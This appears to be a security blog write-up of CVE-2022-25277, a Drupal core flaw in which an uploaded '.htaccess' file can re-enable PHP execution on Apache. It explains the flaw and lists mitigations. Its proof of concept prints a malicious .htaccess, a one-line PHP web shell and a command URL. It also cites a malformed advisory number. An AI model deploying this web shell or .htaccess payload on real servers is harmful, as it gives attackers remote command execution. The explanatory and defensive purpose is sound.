CVE-2022-25277 - Dangerous File Upload Exploit in Drupal Core – How Insecure Filename Handling Led to Remote Code Execution

Drupal, a popular open-source content management system (CMS), is trusted by major organizations and governments due to its flexibility and robust security frameworks. However, even the most secure systems sometimes face overlooked bugs and logic flaws. In this post, we'll break down CVE-2022-25277, an exclusive look at a subtle, yet potentially devastating vulnerability in Drupal's file upload engine that highlights the importance of defense-in-depth.

While previous advisories (SA-CORE-202-012 and SA-CORE-2019-010) tried to prevent upload attacks using sanitization rules, a dangerous interaction between these fixes slipped through. By uploading files named “.htaccess”, attackers could gain control of server behavior, possibly resulting in remote code execution (RCE) on Apache servers. Let's explore how this happens, why it matters, and what code is affected.

References:

- SA-CORE-202-012: Drupal core - Multiple vulnerabilities  
 - SA-CORE-2019-010: Drupal core - Multiple vulnerabilities
 - Original CVE

The File Upload Trouble: Dangerous Extensions

Drupal core has, for many years, included checks to prevent users from uploading files with extensions considered dangerous (like .php, .exe, etc.). This stops attackers from uploading code or scripts that could later be executed by the server.

Here's (roughly) what the originally intended sanitization looked like in the code

// A simplified view of how dangerous extensions are stripped in Drupal.
function sanitizeFilename($filename) {
    $dangerous_ext = ['php', 'exe', 'sh', 'htaccess']; // etc.
    $info = pathinfo($filename);
    if (in_array(strtolower($info['extension']), $dangerous_ext)) {
        $filename = $info['filename'] . '.txt';
    }
    return $filename;
}

Additionally, another routine was meant to strip leading and trailing dots from filenames. This prevents users from uploading files with names such as ".htaccess" or ".htpasswd" directly, since these files control critical server behavior on Apache.

function stripDots($filename) {
    return trim($filename, '.');
}

Here's why

- The sanitization for dangerous extensions and the stripping of dots were applied independently and in the wrong order.
- If an attacker uploads a file called .htaccess, and the field admin (with restricted permissions) allows it:
   - The dangerous extension sanitization does NOT get triggered as expected, since the file starts with a dot and perhaps lacks a valid “extension.”

The file is written as “.htaccess” to the server’s filesystem!

4. Apache, seeing this file in, say, /sites/default/files/.htaccess, will apply its rules, which could disable PHP file protections or re-enable script execution.

Simple Exploit Walkthrough (Proof-of-Concept)

> *Note: This exploit requires permissions that are typically only given to trusted admins. It's also mitigated by server configuration and file field settings. However, it’s an object lesson on complex risk!*

Step 1: Set up a vulnerable file field

An administrator configures a file field to allow the .htaccess extension (explicitly or via a contributed/custom module).

// Example field configuration allowing 'htaccess' extension
$my_field->setAllowedExtensions(['txt', 'jpg', 'htaccess']);

The attacker uploads a file named .htaccess with the following contents

# Malicious .htaccess to turn on PHP execution
AddType application/x-httpd-php .php .phtml
AddHandler application/x-httpd-php .php .phtml

A second upload places shell.php with this code

<?php system($_GET['cmd']); // Classic web shell ?>

The attacker visits

http://example.com/sites/default/files/shell.php?cmd=id

Now shell.php executes on the server, because the attacker's .htaccess told Apache to handle .php files as PHP scripts again!

References and Further Reading

- Drupal SA-CORE-202-012: https://www.drupal.org/sa-core-202-012
- Drupal SA-CORE-2019-010: https://www.drupal.org/sa-core-2019-010
- CVE Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25277

Mitigating Factors

- This can only occur if a site is *explicitly* configured to allow .htaccess file uploads, which is a rare and discouraged setting.

Update Drupal core to the latest version.

- Never allow dangerous extensions like .htaccess, .php, etc., for file uploads unless absolutely necessary.

Double-check file field settings to ensure only safe types are accepted.

- Consider removing .htaccess processing in public files directories where possible, or using stricter server configurations.

In Closing

CVE-2022-25277 highlights how even well-intended security features can clash, creating windows of attack. Especially in complex platforms like Drupal, be wary of customizations and always keep up to date with security advisories. Small misconfigurations, in edge cases, can become high-impact vulnerabilities.

Stay secure, keep learning, and always question your defaults!

*Exclusive coverage by your friendly neighborhood security nerd.*

Timeline

Published on: 04/26/2023 15:15:00 UTC
Last modified on: 05/09/2023 19:26:00 UTC